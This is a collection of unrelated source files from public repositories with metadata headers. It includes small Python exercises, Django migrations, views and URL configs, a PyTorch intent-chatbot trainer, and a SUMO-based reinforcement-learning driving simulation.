fd411011c7f271cb58904da13007ef0f776ce5ac | 13b67fb6d5591c50ad9c2bf5bdd7aef16a00ac83 | /lbc/bits.py | d2bdca61fd86a8e84fd602546e0b5404108ad51c | [] | no_license | A-biao96/python-MP | 0e3d23a8e83e140a77a2a47e33034ae486ac4fa4 | c7596bc8603392480bc101bea619c758123acd68 | refs/heads/master | 2023-03-21T03:15:41.847013 | 2017-10-19T06:48:34 | 2017-10-19T06:48:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,040 | py | import ctypes
# str2bits
def write(bs_in, fname):
dll = ctypes.cdll.LoadLibrary
# bitstream = dll('lbc/bitstream.so')
bitstream = dll('./bitstream.so')
bs_in = bs_in.encode('utf-8')
fname = fname[:-4]+'.lbc'
fname = fname.encode('utf-8')
bitstream.write(bs_in, fname)
# parse hex stream
def hex2bit(fin):
if '.' in fin:
with open(fin) as f:
hexstr = f.read()
else: hexstr=fin
bitstream = ''
for each_hex in hexstr:
# hex to binary
bits = bin(int(each_hex, 16))[2:]
# put in bit jar
bits = '0'*(4-len(bits)) + bits
bitstream += bits
return bitstream
# read from file
def read(fn):
with open(fn, "rb") as f:
d_hex = f.read().hex()
return hex2bit(d_hex)
if __name__=='__main__':
'''
the len of bit stream should be multiples of 8bits
'''
#a = '011111101110001100100000'
a = '1'*24
_a = a.encode('utf-8')
fn = "str.bits"
_fn = fn.encode('utf-8')
write(_a, _fn)
print(read(fn))
| [
"supertab@126.com"
] | supertab@126.com |
a7c8fa0bda79edadd701b585eff8e09a773467c6 | e7c3d2b1fd7702b950e31beed752dd5db2d127bd | /code/super_pandigital_numbers/sol_571.py | 50c76cee64069e830d981145a37c35c2cc3edff5 | [
"Apache-2.0"
] | permissive | Ved005/project-euler-solutions | bbadfc681f5ba4b5de7809c60eb313897d27acfd | 56bf6a282730ed4b9b875fa081cf4509d9939d98 | refs/heads/master | 2021-09-25T08:58:32.797677 | 2018-10-20T05:40:58 | 2018-10-20T05:40:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py |
# -*- coding: utf-8 -*-
'''
File name: code\super_pandigital_numbers\sol_571.py
Author: Vaidic Joshi
Date created: Oct 20, 2018
Python Version: 3.x
'''
# Solution to Project Euler Problem #571 :: Super Pandigital Numbers
#
# For more information see:
# https://projecteuler.net/problem=571
# Problem Statement
'''
A positive number is pandigital in base b if it contains all digits from 0 to b - 1 at least once when written in base b.
A n-super-pandigital number is a number that is simultaneously pandigital in all bases from 2 to n inclusively.
For example 978 = 11110100102 = 11000203 = 331024 = 124035 is the smallest 5-super-pandigital number.
Similarly, 1093265784 is the smallest 10-super-pandigital number.
The sum of the 10 smallest 10-super-pandigital numbers is 20319792309.
What is the sum of the 10 smallest 12-super-pandigital numbers?
'''
# Solution
# Solution Approach
'''
'''
| [
"vaidic@vaidicjoshi.in"
] | vaidic@vaidicjoshi.in |
193caad783e4de81c0b362210d6ee8a1d18405e9 | 373a3c8ff0dccf4efd8d7c8b44b36f598b1e19a4 | /python_fund/checkerboard.py | 38e68a190551edcf69cb09ec18293d54ac8cb345 | [] | no_license | chelxx/Python | 4562033107c8426cae9e20fdc31bf9e206447098 | ec6cc3391b74e2b6970340f4496fbebe4fa1ebcd | refs/heads/master | 2021-05-04T22:49:07.621386 | 2018-04-10T02:02:14 | 2018-04-10T02:02:14 | 120,058,104 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | # Checkerboard Assignment
# Print an 8-row checkerboard: even rows flush left, odd rows offset one cell.
for row in range(0, 8):
    if row % 2 == 0:
        print ("* * * * ")
    else:
        print (" * * * *")
# END | [
"chex239@gmail.com"
] | chex239@gmail.com |
8902a1d28f71f5a29b9844e1ab8f73700ccc0de0 | df2aeccfd7f5225ceca31708485af917578cb7b4 | /task/migrations/0004_task_image.py | 7272dd3e311cc539512e730f516d859ef8ac2a3d | [] | no_license | Romissevd/task_book | 59f35b333b042a192ee1ad90371fca70c3f7c0d6 | f3ef29bf7491e62202cdf8251d7b6841892e140e | refs/heads/master | 2020-12-05T23:28:50.696159 | 2020-01-07T21:04:28 | 2020-01-07T21:04:28 | 232,276,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | # Generated by Django 2.2.8 on 2020-01-07 19:47
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the optional ``image`` field to the ``task`` model."""

    # Must run after the previous migration of the task app.
    dependencies = [
        ('task', '0003_auto_20200107_1903'),
    ]

    operations = [
        migrations.AddField(
            model_name='task',
            name='image',
            # blank=True makes the field optional in forms; upload_to=''
            # stores uploads directly under MEDIA_ROOT.
            field=models.ImageField(blank=True, upload_to=''),
        ),
    ]
| [
"Romissevd@gmail.com"
] | Romissevd@gmail.com |
3b8d3df2466737bfb45f2151369b8a7fa8e44cd9 | a5fac621f4d7150194d1ef717d588c3109a3ccb0 | /train.py | 761fab3cf274215a353dbbec6e841768b7a6233a | [
"MIT"
] | permissive | ShafkatIslam/pytorch-chatbot-master | 446b780b4a154920d8adfeac1982840aa99fc0b0 | 56e1b4e358395b6dee0431ca316c86ffbe4724b2 | refs/heads/master | 2023-01-30T06:15:53.676514 | 2020-12-13T11:21:15 | 2020-12-13T11:21:15 | 313,303,907 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,969 | py | import numpy as np
import random
import json
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
from nltk_utils import bag_of_words, tokenize, stem
from model import NeuralNet
# Load the intent definitions (tags with their example patterns).
with open('intents.json', 'r') as f:
    intents = json.load(f)
all_words = []  # every token seen across all patterns
tags = []  # one tag per intent
xy = []  # (tokenized pattern, tag) training pairs
# loop through each sentence in our intents patterns
for intent in intents['intents']:
    tag = intent['tag']
    # add to tag list
    tags.append(tag)
    for pattern in intent['patterns']:
        # tokenize each word in the sentence
        w = tokenize(pattern)
        # add to our words list
        all_words.extend(w)
        # add to xy pair
        xy.append((w, tag))
# stem and lower each word
# NOTE(review): '0-9' only removes the literal two-character token "0-9",
# not digit tokens in general -- confirm that is intended.
ignore_words = ['?', '.', '!', '-', ',', '0-9', '(', ')']
# NOTE(review): 'is' appears twice in this stop list; harmless but redundant.
stopset = ['a', 'an', 'the', 'i', 'you', 'one', 'of', 'in', 'for', 'to', 'by', 'about', 'off', 'did', 'am', 'is', 'are', 'was', 'were', 'if', 'is', 'on', 'what', 'why', 'when', 'where', 'which', 'and', 'how', 'tell', 'me', 'my', 'must', 'could', 'that', 'or','anyone', 'any', 'many', 'there']
# Drop punctuation tokens, then stop words. NOTE(review): tokens are stemmed
# twice (here and again below); harmless if stem() is idempotent -- confirm.
all_word = [stem(w) for w in all_words if w not in ignore_words]
# all_word = [tokenize(w) for w in all_words if w not in ignore_words]
all_words = [stem(w) for w in all_word if w not in stopset]
#all_words = [tokenize(w) for w in all_word if w not in stopset]
# remove duplicates and sort
all_words = sorted(set(all_words))
tags = sorted(set(tags))
print(">>", len(xy), "patterns")
print(">>", len(tags), "tags:", tags)
print(len(all_words), "unique stemmed words:", all_words)
# create training data
X_train = []
y_train = []
for (pattern_sentence, tag) in xy:
    # X: bag of words for each pattern_sentence
    bag = bag_of_words(pattern_sentence, all_words)
    X_train.append(bag)
    # y: PyTorch CrossEntropyLoss needs only class labels, not one-hot
    label = tags.index(tag)
    y_train.append(label)
X_train = np.array(X_train)
y_train = np.array(y_train)
# Hyper-parameters
num_epochs = 1000
batch_size = 8
learning_rate = 0.001
input_size = len(X_train[0])  # length of the bag-of-words vector
hidden_size = 8
output_size = len(tags)  # one logit per intent tag
print(">>Input_Size: ", input_size, "\n>>Output_Size:", output_size)
class ChatDataset(Dataset):
    """In-memory dataset wrapping the bag-of-words features and labels."""

    def __init__(self):
        # Capture the module-level training arrays once at construction time.
        self.n_samples = len(X_train)
        self.x_data = X_train
        self.y_data = y_train

    def __getitem__(self, index):
        # dataset[i] -> (features, label) pair for sample i.
        sample = (self.x_data[index], self.y_data[index])
        return sample

    def __len__(self):
        # len(dataset) -> number of stored samples.
        return self.n_samples
# Wrap the arrays in a Dataset/DataLoader so training can shuffle mini-batches.
dataset = ChatDataset()
train_loader = DataLoader(dataset=dataset,
                          batch_size=batch_size,
                          shuffle=True,
                          num_workers=0)
# Use the GPU when one is available.
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = NeuralNet(input_size, hidden_size, output_size).to(device)
# Loss and optimizer
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# Train the model
for epoch in range(num_epochs):
    for (words, labels) in train_loader:
        words = words.to(device)
        # CrossEntropyLoss expects integer class indices.
        labels = labels.to(dtype=torch.long).to(device)
        # Forward pass
        outputs = model(words)
        # if y would be one-hot, we must apply
        # labels = torch.max(labels, 1)[1]
        loss = criterion(outputs, labels)
        # Backward and optimize
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
    if (epoch+1) % 100 == 0:
        # Progress report every 100 epochs (loss of the last mini-batch).
        print (f'Epoch: [{epoch+1}/{num_epochs}], Loss: {loss.item():.3f}')
# print(f'final loss: {loss.item():.3f}') # checking final loss
# Bundle the weights with the vocabulary/tag metadata needed at inference time.
data = {
"model_state": model.state_dict(),
"input_size": input_size,
"hidden_size": hidden_size,
"output_size": output_size,
"all_words": all_words,
"tags": tags
}
FILE = "data.pth"
torch.save(data, FILE)
print(f'training complete. file saved to {FILE}')
| [
"mohammadshafkatislam@gmail.com"
] | mohammadshafkatislam@gmail.com |
efe4f1d33f79c254a8e5398dd52130a3341dc355 | 24fe7b918b137da0096a0f2e5cb086b46f38e1d4 | /tp4/Ej11.py | 9b9f8af7bfd2b81c2151187dbd6b61c0b78ca41c | [] | no_license | lrlichardi/Python | 4d5f53d4f3d5a5afb868656bc104601b096f7ef0 | fd77bae450a6df5fcae4af1c48cd46d4451b1d53 | refs/heads/main | 2023-08-22T20:50:57.915456 | 2021-10-14T23:54:57 | 2021-10-14T23:54:57 | 383,619,642 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | # Escribir un programa que pida al usuario una palabra y luego muestre por pantalla una a
# (cont.) ...show the letters of the entered word one by one, last one first.
palabra = input('Ingrese una palabra!: ')
# Pass 1: iterate the characters in reverse order.
for i in reversed(palabra):
    print(i)
# Pass 2: same output, walking the indices from the last down to 0.
for i in range(len(palabra)-1 , -1 , -1):
print(palabra[i]) | [
"lrlichardi@hotmail.com"
] | lrlichardi@hotmail.com |
086f15693af91521b68d827e7613c2ac26e02baf | 7f57c12349eb4046c40c48acb35b0f0a51a344f6 | /2015/PopulatingNextRightPointersInEachNode_v1.py | 3577626399488b0ca50d165ddf85bbb001892a21 | [] | no_license | everbird/leetcode-py | 0a1135952a93b93c02dcb9766a45e481337f1131 | b093920748012cddb77258b1900c6c177579bff8 | refs/heads/master | 2022-12-13T07:53:31.895212 | 2022-12-10T00:48:39 | 2022-12-10T00:48:39 | 11,116,752 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,362 | py | #!/usr/bin/env python
# encoding: utf-8
# Definition for binary tree with next pointer.
class TreeLinkNode:
    """Binary-tree node carrying an extra `next` pointer to its right neighbour."""

    def __init__(self, x):
        self.val = x
        # Children and the level-order `next` link start out unset.
        self.left = self.right = self.next = None

    def __repr__(self):
        # TreeLinkNode(3) renders as "<3>".
        return '<{}>'.format(self.val)
class Solution:
    # @param root, a tree link node
    # @return nothing
    def connect(self, root):
        """Populate each node's `next` pointer to its right neighbour.

        Assumes a perfect binary tree (every parent has two children),
        as in the LeetCode problem statement.
        """
        self.dfs(root)
    def dfs(self, root):
        # Pre-order walk: wire this node's children, then recurse.
        if not root:
            return
        if root.left:
            # The left child's neighbour is its sibling.
            root.left.next = root.right
            if root.next and root.right:
                # The right child's neighbour is the left child of the
                # parent's own `next` neighbour.
                root.right.next = root.next.left
        self.dfs(root.left)
        self.dfs(root.right)
    def levelorder(self, root):
        # Debug helper: breadth-first dump of each node, its value and its
        # `next` pointer. NOTE(review): Python 2 print statement below.
        queue = [root]
        while queue:
            n = queue.pop()
            print n, n.val, n.next, '<<<'
            if n.left:
                queue = [n.left] + queue
            if n.right:
                queue = [n.right] + queue
if __name__ == '__main__':
    # Build the perfect binary tree 1..7, wire up the next pointers and
    # dump the result level by level.
    s = Solution()
    n1 = TreeLinkNode(1)
    n2 = TreeLinkNode(2)
    n3 = TreeLinkNode(3)
    n4 = TreeLinkNode(4)
    n5 = TreeLinkNode(5)
    n6 = TreeLinkNode(6)
    n7 = TreeLinkNode(7)
    root = n1
    n1.left = n2
    n1.right = n3
    n2.left = n4
    n2.right = n5
    n3.left = n6
    n3.right = n7
    s.connect(root)
    s.levelorder(root)
| [
"stephen.zhuang@gmail.com"
] | stephen.zhuang@gmail.com |
8145eef152b0e0546104415648fdf30f8856f9c9 | cc6a2c63078b6e0a84df1dfd149614959b186380 | /CodingDojang/Unit 11/11.9.py | adf7993f9f3613d26477bcaa85c781f3a8cb2b6d | [] | no_license | midi0/python | 03d01dceb01f73acd76f1d18cdfd01038bbb2ea8 | 45750665b93bfec997fd1e791e2e397f51339d37 | refs/heads/master | 2021-01-13T23:16:22.771383 | 2020-04-08T17:35:43 | 2020-04-08T17:35:43 | 242,525,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 61 | py | a = input()
b = input()
# Keep the characters of `a` at odd indices (1, 3, 5, ...).
a = a[1::2]
# Keep the characters of `b` at even indices (0, 2, 4, ...).
b = b[::2]
print(a+b) | [
"noreply@github.com"
] | midi0.noreply@github.com |
6e4a096a79eecbd1765bace94da05b888bc3f648 | cbce4bc7efedee1908067500f6c5f222179881c1 | /matcher.py | f89c48599be2fd876e99195b984c249785dbe6df | [] | no_license | emulation-as-a-service/co-oc | 6982212b84dc3fb6bc28498d75e2eee8a2f5ba94 | e5b5a77abc789f5e235d6c7dcb3eb35c88a7ece4 | refs/heads/main | 2023-07-23T10:18:37.392044 | 2020-11-11T00:09:00 | 2020-11-11T00:09:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,565 | py |
import copy
class Matcher:
    """Scores and ranks environments against a data object's file formats."""

    def __init__(self, environmentProcessor):
        # Supplies environmentIdMap (name -> id) and
        # readable_formats_of_environment (id -> readable formats).
        self.environmentProcessor = environmentProcessor

    def _readable_set(self, environmentId):
        # Set of formats the environment can read.
        # IMPROVED: built directly with set() instead of the original
        # copy.deepcopy(...) followed by a pop()-until-empty loop, which
        # emptied a throwaway copy element by element on every call.
        return set(self.environmentProcessor.readable_formats_of_environment[environmentId])

    def calculate_object_environment_overlap_weight(self, environmentId, data_object_matrix):
        """
        Calculates the weight of the overlap between the data object and the given environment
        :param environmentId: Id of the environment
        :param data_object_matrix: Matrix which represents format combinations
        of the data objects and the specific data object
        :return: Weight of the overlap between the data object and the given environment
        """
        readable = self._readable_set(environmentId)
        mat = data_object_matrix.tocoo()
        total = 0
        for row, col, value in zip(mat.row, mat.col, mat.data):
            # Count a combination only when both formats are readable.
            if row in readable and col in readable:
                total += value
        return total

    def rank_environments_for_object(self, data_object_matrix):
        """
        Ranks the environments for a data object based upon the format distribution
        of the data objects in general and the specific format distribution of the data object
        :param data_object_matrix: Matrix which represents format combinations
        of the data objects and the specific data object
        :return: Sorted list of the likely environments
        """
        scored = []
        for name, env_id in self.environmentProcessor.environmentIdMap.items():
            overlap = self.calculate_object_environment_overlap_weight(env_id, data_object_matrix)
            scored.append((name, overlap))
        return sorted(scored, key=lambda tup: tup[1], reverse=True)

    def calculate_tf_idf_overlap(self, environmentId, tf_map, idf_map, avdl, dl, k, b):
        """
        Calculates the weight of the overlap between environment and data object based on
        the tf-idf values of the formats
        :param environmentId: Id of the environment
        :param tf_map: Map which stores the tf values of the formats for a given data object
        :param idf_map: Map which stores the idf values for each format
        :param avdl: Average document length -> Average number of files in a data object
        :param dl: Document length -> Number of files in data object
        :param k: Control parameter
        :param b: Control parameter
        :return: Weight of the overlap (Score of the environment in respect to a data object)
        """
        total = 0
        for fmt in self._readable_set(environmentId):
            if fmt in tf_map:
                total += Matcher.bm25_formula(tf_map[fmt], idf_map[fmt], dl, avdl, k, b)
        return total

    @staticmethod
    def bm25_formula(tf, idf, dl, avdl, k, b):
        """
        Calculates the relevance of a format
        :param tf: Term frequency
        :param idf: Inverse document frequency
        :param dl: Document length -> Number of files in data object
        :param avdl: Average document length -> Average number of files in a data object
        :param k: Control parameter
        :param b: Control parameter
        :return: Score based on the Okapi Bm25 formula
        """
        tf_ = (tf * (k + 1))/(k * (1 - b + b * (dl / avdl)) + tf)
        return tf_ * idf

    def rank_environments_tf_idf(self, tf_map, idf_map, avdl, dl, k, b):
        """
        Ranks all possible Environments according to tf-idf values of the formats
        which are shared by the data object and the environments
        :param tf_map: Map which stores the tf values of the formats for a given data object
        :param idf_map: Map which stores the idf values for each format
        :param avdl: Average document length -> Average number of files in a data object
        :param dl: Document length -> Number of files in data object
        :param k: Control parameter
        :param b: Control parameter
        :return: Sorted list of the likely environments
        """
        scored = []
        for name, env_id in self.environmentProcessor.environmentIdMap.items():
            overlap = self.calculate_tf_idf_overlap(env_id, tf_map, idf_map, avdl, dl, k, b)
            scored.append((name, overlap))
        return sorted(scored, key=lambda tup: tup[1], reverse=True)
| [
"julian.giessl@gmx.de"
] | julian.giessl@gmx.de |
caff08d7c2133d4694efc128cb57b109c56bebf5 | f012a549ae884b6305cae45c9e0de543cad5b439 | /ControlFlow.py | 0e27341eff46a05d610f214f19163834b62ffbf5 | [] | no_license | Jtallen2002/Control-Flow | c28722abf9329a10b5b5916ac791ba9c7615323e | 59b5a930208690550c0275fbb5e47c250272f3eb | refs/heads/master | 2020-10-01T20:05:18.010891 | 2019-12-19T13:30:51 | 2019-12-19T13:30:51 | 227,615,018 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | """
Programmer: Jake Allen
Date: 12-16-19
Program: Guess My Number
"""
# The secret number the player has to find.
myNumber = 7
print("\nGuess a number between 1 & 10\n")
# Keep prompting until the guess matches; retries use a different prompt.
prompt = "Enter a guess: "
while True:
    guess = int(input(prompt))
    if guess == myNumber:
        break
    prompt = "\nWrong, enter a new guess: "
print("\nCongratulations, you found my number!\n")
"""
Programmer: Jake Allen
Date: 12-19-19
Program: 1-10
"""
# Count upwards from 1, printing each value, until 10 has been printed.
x = 1
while x < 11:
    print(x)
    x += 1
| [
"jtallen6109@gmail.com"
] | jtallen6109@gmail.com |
3de6ef686c512a9ef83b12288393e644638d149b | dd522a4b8e1175e1ccb7a2b1e358486c80780f85 | /my_site/urls.py | d571e39ed89b44b701bfa99658ef92924aa1932f | [] | no_license | bismarkstoney/tencedis-com | 9672d7d464c7a0f390ed2274032e581f546fd0f0 | 00900d4c89b387aad19af58d1aca71dd8fef6605 | refs/heads/main | 2023-03-21T06:50:40.819041 | 2021-03-01T05:15:31 | 2021-03-01T05:15:31 | 341,997,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,073 | py | """my_site URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf import settings
from django.urls import path, include
from django.conf.urls.static import static
# Root URL map: each feature area delegates to its own app's urlconf,
# and the Django admin stays under /admin/.
urlpatterns = [
    path('', include('pages.urls')),
    path('listing/', include('listing.urls')),
    path('contacts/', include('contacts.urls')),
    path('admin/', admin.site.urls),
]
# Serve user-uploaded media through Django only during development.
if settings.DEBUG: # new
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | [
"bismarkstoney@yahoo.com"
] | bismarkstoney@yahoo.com |
37a55e826ebb167071a7c6afe9b42c8b3264506b | b24e45267a8d01b7d3584d062ac9441b01fd7b35 | /Usuario/.history/views_20191023114840.py | 870eeb90df98b7537147ae14418728dfb2b3fb07 | [] | no_license | slalbertojesus/merixo-rest | 1707b198f31293ced38930a31ab524c0f9a6696c | 5c12790fd5bc7ec457baad07260ca26a8641785d | refs/heads/master | 2022-12-10T18:56:36.346159 | 2020-05-02T00:42:39 | 2020-05-02T00:42:39 | 212,175,889 | 0 | 0 | null | 2022-12-08T07:00:07 | 2019-10-01T18:56:45 | Python | UTF-8 | Python | false | false | 2,211 | py | from django.shortcuts import render
from rest_framework import status
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import AllowAny
from rest_framework.response import Response

from .models import Usuario
from .serializers import UsuarioSerializer
# Spanish status strings returned in the API response payloads.
SUCCESS = 'exito'
ERROR = 'error'
DELETE_SUCCESS = 'eliminado'
UPDATE_SUCCESS = 'actualizado'
CREATE_SUCCESS = 'creado'
@api_view(['GET', ])
def api_detail_usuario_view(request, identificador):
    """Return the serialized Usuario for `identificador`, or 404 if absent."""
    try:
        usuario = Usuario.objects.get(identificador=identificador)
    except Usuario.DoesNotExist:
        # BUG FIX: the exception lives on the model class. The original
        # `except usuario.DoesNotExist` referenced a local that is unbound
        # when .get() raises, turning a missing row into a NameError.
        return Response(status=status.HTTP_404_NOT_FOUND)
    if request.method == 'GET':
        serializer = UsuarioSerializer(usuario)
        return Response(serializer.data)
@api_view(['PUT',])
def api_update_usuario_view(request, identificador):
    """Replace the Usuario for `identificador` with the request payload.

    Returns {'exito': 'actualizado'} on success, 400 on validation errors
    and 404 when no such user exists.
    """
    try:
        usuario = Usuario.objects.get(identificador=identificador)
    except Usuario.DoesNotExist:
        # BUG FIX: `usuario.DoesNotExist` referenced an unbound local when
        # .get() raised; the exception must be looked up on the model class.
        return Response(status=status.HTTP_404_NOT_FOUND)
    if request.method == 'PUT':
        serializer = UsuarioSerializer(usuario, data=request.data)
        data = {}
        if serializer.is_valid():
            serializer.save()
            data[SUCCESS] = UPDATE_SUCCESS
            return Response(data=data)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['DELETE',])
def api_delete_usuario_view(request, identificador):
    """Delete the Usuario for `identificador`.

    Returns {'exito': 'eliminado'} on success and 404 when no such user
    exists.
    """
    try:
        usuario = Usuario.objects.get(identificador=identificador)
    except Usuario.DoesNotExist:
        # BUG FIX: `usuario.DoesNotExist` referenced an unbound local when
        # .get() raised; the exception must be looked up on the model class.
        return Response(status=status.HTTP_404_NOT_FOUND)
    if request.method == 'DELETE':
        operation = usuario.delete()
        data = {}
        if operation:
            data[SUCCESS] = DELETE_SUCCESS
        return Response(data=data)
@api_view(['POST'])
@permission_classes([AllowAny])
def api_create_usuario_view(request, identificador):
    """Create a new Usuario for `identificador` from the request payload.

    Returns 201 with the serialized user on success, 400 on validation
    errors and 409 when a user with that identificador already exists.
    """
    # BUG FIX: the original caught `usuario.DoesNotExist` (an unbound local,
    # i.e. a NameError) and then passed that same unbound `usuario` to the
    # serializer, so every create attempt crashed; it also fell through
    # returning None when the user already existed.
    if request.method == 'POST':
        if Usuario.objects.filter(identificador=identificador).exists():
            return Response(status=status.HTTP_409_CONFLICT)
        serializer = UsuarioSerializer(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
| [
"slalbertojesus@gmail.com"
] | slalbertojesus@gmail.com |
2b6396646956ef47745a11f2e243e9b2af000ff5 | 095b8390d1332a3f5923db51445e6e3d7a75ffe9 | /config/asgi.py | 2f8aef61be2bcfbf821c9c49cbd0d781039299e7 | [] | no_license | Lee-Su-gyeong/Online-travel | cefae6ee2a39ad618f8286a72db8ddf705d131cd | 24585999b992b184a17fdd9b89e174f74218ba16 | refs/heads/master | 2023-04-29T22:23:42.930542 | 2021-05-13T17:15:49 | 2021-05-13T17:15:49 | 367,111,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
ASGI config for Onlinetravel project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Select the settings module before the ASGI application object is built.
# NOTE(review): the file lives under config/ but points at
# 'Onlinetravel.settings' -- confirm the settings package name matches.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Onlinetravel.settings')
application = get_asgi_application()
| [
"dune2011@naver.com"
] | dune2011@naver.com |
a80c2f84ddce394f8f18a26f7aba838943052681 | 139929d142e901a2b7c594c76bbd4deb2ab206ec | /Training.py | 8cc462987d2b4f9dfdce8643094ef8cb7a20a114 | [
"Apache-2.0"
] | permissive | HamidShoaraee/Autonomous-Driving | 53e5f016729eec81ef7647f7ee0f97c34d477ad9 | 93519fb3d78120db15fdadfd1f38ce9e2a52cea8 | refs/heads/main | 2023-08-17T14:26:44.757529 | 2021-10-11T16:33:33 | 2021-10-11T16:33:33 | 407,266,883 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,242 | py | """
In this file we start simulation and try to train the agent to take the best actions.
This file connect modules of the both simulation.py and DQNAgent.py
"""
import numpy as np
from numpy.core import numeric
from simulation import Vehicles, Road, Simulation
import simulaiton_params as s
from DQNAgent import Memory, Agent, EpsilonGready
import traci
import random
from sumolib import checkBinary
import tensorflow as tf
import matplotlib.pyplot as plt
from visualization import Visual
####################################### Run simulation and Training ###############################
# Experiment configuration, read from simulaiton_params.sim_params.
number_of_games = s.sim_params["number_of_games"]
gui_use = s.sim_params['gui_use'] # training with the gui is slow -- not a good idea!
sumo_ctrl = False # Training without help of SUMO
action = s.sim_params['action'] # available discrete actions
epsilon = s.sim_params['epsilon'] # exploration threshold for the decayed eps
batch_size = s.sim_params['batch_size']
min_size_memory = s.sim_params['min_size_memory']
max_size_memory = s.sim_params['max_size_memory']
# Simulation, agent and visualization helpers.
veh = Vehicles(sim_params= s.sim_params)
sim_1 = Simulation(sim_params=s.sim_params)
replay_memory = Memory(capacity=50)
agent = Agent (sim_params = s.sim_params)
epsilon_gredy = EpsilonGready(sim_params = s.sim_params)
visual = Visual(sim_params=s.sim_params)
np.random.seed(32) # reproducible runs
# Accumulators filled over all episodes.
experiences = []
rewards = []
reward_avg_list = []
steps = []
ego_emg_same_list = []
out_of_roads_list = []
emg_reach_end_list = []
accidents_list = []
speed_violation_list = []
# One SUMO episode per game: run headless, act step by step, store the
# transitions and train on sampled mini-batches.
for i in range (number_of_games):
    sumoBinary = checkBinary('sumo') # headless binary; training + gui --> computational cost!
    traci.start([sumoBinary, "-c", "highway.sumocfg", "--start"]) # Start the simulation.
    veh.remove()
    # Per-episode bookkeeping.
    done = False
    step = 0
    episode_reward = 0
    accident_times = 0
    out_road_times = 0
    emg_reach_end = 0
    total_rewards = 0
    speed_violation_times = 0
    same_lane_times = 0
    # Linearly decayed exploration rate, derived from the episode index.
    initial_eps = 1
    eps_decay = 0.0005
    eps = initial_eps - (eps_decay * i)
    # NOTE(review): the loop variable below shadows the episode index `i`;
    # harmless because `i` is reassigned each episode, but confusing.
    for i in range (2): # two simulation steps at the beginning before adding vehicles
        traci.simulationStep()
    veh.add()
    veh.control()
    while done is False :
        current_state = sim_1.observation()
        # exploration vs exploitation (first explore more, then exploit)
        if eps > epsilon :
            rand_action = random.randrange(len(action)) # explore: random action
        else :
            rand_action = np.argmax (agent.get_qs(state = current_state)) # exploit: greedy w.r.t. predicted Q-values
        sim_1.action_func(rand_action)
        traci.simulationStep()
        new_state = sim_1.observation()
        # info: ego_collision, out_of_road, change_lane, ego_emg_same_lane, speed_violation
        new_state, reward, done, info = sim_1.step(rand_action)
        if info[2] == True :
            emg_reach_end += 1
        if info[3] == True :
            same_lane_times += 1
        if info[4] == True :
            speed_violation_times += 1
        step += 1
        episode_reward += reward
        # Store the transition for experience replay.
        sample = [current_state, rand_action, new_state, reward, done]
        experiences.append(sample)
    # Episode over: record the per-episode statistics.
    emg_reach_end_list.append(emg_reach_end)
    ego_emg_same_list.append(same_lane_times)
    speed_violation_list.append(speed_violation_times)
    steps.append(step)
    traci.close()
    if info [0] == True :
        accident_times = 1
    accidents_list.append(accident_times)
    if info[1] == True :
        out_road_times = 1
    out_of_roads_list.append(out_road_times)
    # Bound the replay buffer: below the cap the last sample is re-added,
    # at the cap the oldest entry is dropped.
    if len(experiences) < max_size_memory:
        experiences.append(sample)
    if len(experiences) == max_size_memory:
        experiences.pop(0)
    # Get a batch from the filled memory and train on it.
    if len (experiences) > batch_size * 2 :
        minibatch = random.sample(experiences, batch_size)
        experiences = []
        agent.train( termination_state = done , minibatch = minibatch)
        current_state = new_state
    rewards.append(episode_reward)
    # NOTE(review): `s` below shadows the `simulaiton_params as s` module
    # alias, and this averaging block runs on every episode, so
    # reward_avg_list accumulates duplicate averages -- confirm intent.
    s = np.arange(0, number_of_games + 1, step=5)
    len_s = len(s)
    for i in range (len_s - 1):
        reward_avg = np.average(rewards[s[i]:s[i+1]])
        reward_avg_list.append(reward_avg)
# Final summary: raw and averaged episode rewards.
print ("rewards",rewards)
print ("reward_length", len(rewards))
print ("average_rewards", reward_avg_list)
print ("avg_reward_len", len(reward_avg_list))
# Save the model
agent.save_model()
# visual.reward_plot(reward= rewards)
# Plot the collected per-episode statistics.
visual.general_plot (accidents=accidents_list, out_of_roads =out_of_roads_list,
                     same_lane_emg=ego_emg_same_list, emg_reach_end=emg_reach_end_list, steps= steps, speed_violation=speed_violation_list)
#Scatter plot of the reward function
visual.reward_plot(reward = rewards)
#Scatter plot of the average reward function
